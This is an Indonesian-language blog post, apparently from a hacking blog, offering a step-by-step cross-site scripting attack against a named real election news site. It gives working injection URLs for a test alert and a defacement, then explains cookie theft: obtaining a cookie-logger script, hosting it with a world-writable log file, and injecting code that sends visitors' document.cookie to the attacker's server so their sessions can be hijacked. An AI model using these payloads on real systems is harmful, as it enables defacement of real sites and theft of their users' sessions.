XXS attack  

Posted

XXS attack
Proof of Concept (pembuktian)
####################################
Apa itu xss attack??? silakan cari disini : google.com atau jasakom.com

target : http://pemilu.antara.co.id

1.mengetaui site itu mempunyai celah xss attack:
->masukkan javascript untuk memunculkan kotak dialog(pd contoh ini script dimasukkan melalui fasilitas search yg terdapat pd site tsb),contoh:
contoh: http://pemilu.antara.co.id/search/?skey=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&schclicked=Cari

2.jika site itu terkena bug xss attack,maka banyak yg dpt kita lakukan dgn memanfaatkan kelemahan tsb,misalnya:
->mendeface
contoh : http://pemilu.antara.co.id/search/?skey=%3Chtml%3E%3Cbody%3E%3Cimg%20src=%22http://img184.imageshack.us/img184/8559/sukro2sj5.jpg%22%3E%3C/body%3E%3C/html%3E&schclicked=Cari

->mencuri cookie
Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.
Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.

masukan code ini->

Code:window.location = "http://server lo.com/cookielogger.php?c="+document.cookie

atau

Code:document.location = "http://Server lo.com/cookielogger.php?c="+document.cookie

hingga otomatis url pada site berubah menjadi

Code: http://Target.com/search.php?q=document.location = "http://server lo.com/cookielogger.php?c="+document.cookie


Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.

0 comments

Posting Komentar